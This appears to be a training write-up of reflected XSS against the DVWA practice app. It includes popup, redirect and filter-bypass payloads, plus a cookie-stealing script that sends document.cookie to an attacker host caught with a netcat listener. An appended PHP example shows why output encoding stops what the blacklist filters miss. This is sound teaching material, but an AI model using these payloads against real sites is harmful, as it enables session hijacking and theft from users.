DVWA: XSS cross-site scripting attack (reflected)
Environment and principles
Environment: Kali Linux, DVWA, attacking machine (Windows 10), attacked machine (Windows XP)
Principle
1. Popup
2. Redirect
3. Get cookie
Low level
1. Pop-up window
JS malicious code:
# Direct embedding
<script>alert('xss')</script>
# Element events
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>type</a>
Insert malicious code.
Return to the page where the malicious code is inserted.
Send the URL to the attacked person. The attacked person opens the page and triggers the XSS.
2. Redirect
JS malicious code:
<script>window.location = "http://www.baidu.com"</script>
Return to the page where the JS was inserted and send the URL to the attacked person.
The attacked person opens the URL:
A redirect occurs.
3. Get cookies
JS malicious code:
<script>alert(document.cookie)</script>
<script src='http://xxxxx/a.js'></script>
Create an a.js file in the /var/www/html/ directory on Kali Linux with the following content:
var img = new Image();
img.src='http://IP-address:port/cookie.php?cookie='+document.cookie;
Insert the malicious code, return to the page, and use the attacked machine to access the URL.
On Kali Linux, use nc -vnlp 88 to listen on port 88:
The cookie is returned.
Medium level
Source code: The <script> tag is filtered.
You can use other tags to trigger XSS, or use mixed case to bypass the filter:
<sCriPt>alert('xss')</script>
Double-write bypass:
<sc<script>ript>alert('xss')</script>
Successfully triggered:
High level
Source code: A regular expression matches and filters <script> tags.
Use other tags to bypass:
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>type</a>
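Why the Medium and High filters let these inputs through while output encoding does not, as an added PHP example (not DVWA's own source and not part of the original page). filter_medium and filter_high are assumed models of the two filters described above, and has_live_tag is a hypothetical helper that reports whether an opening tag survives in the output.

```php
<?php
// Added example. The filter patterns below are assumptions modelled on the
// page's description of the Medium and High levels.

function filter_medium(string $name): string {
    // Single-pass, case-sensitive removal of the literal "<script>" string.
    return str_replace('<script>', '', $name);
}

function filter_high(string $name): string {
    // Case-insensitive regex that strips anything spelling "<..s..c..r..i..p..t".
    return preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name) ?? '';
}

function encode_output(string $name): string {
    // Output encoding: <, >, &, " and ' all become HTML entities,
    // so the browser renders the input as text instead of parsing it.
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function has_live_tag(string $html): bool {
    // An opening tag is still present if "<" is followed by a letter.
    return preg_match('/<[a-z]/i', $html) === 1;
}

// Inputs taken from the page.
$inputs = [
    "<script>alert('xss')</script>",
    "<sCriPt>alert('xss')</script>",
    "<sc<script>ript>alert('xss')</script>",
    "<img src = '' onerror = alert('xss')>",
];

$handlers = [
    'medium' => 'filter_medium',
    'high'   => 'filter_high',
    'encode' => 'encode_output',
];

foreach ($inputs as $in) {
    foreach ($handlers as $label => $fn) {
        $out = $fn($in);
        // "TAG" means markup survived the handler; "safe" means none did.
        printf("%-7s %-5s %s\n", $label, has_live_tag($out) ? 'TAG' : 'safe', $out);
    }
    echo "\n";
}
```

Only the encode rows report "safe" for all four inputs: a blacklist has to anticipate every tag and spelling, while encoding at output time removes the browser's ability to parse any of them as markup.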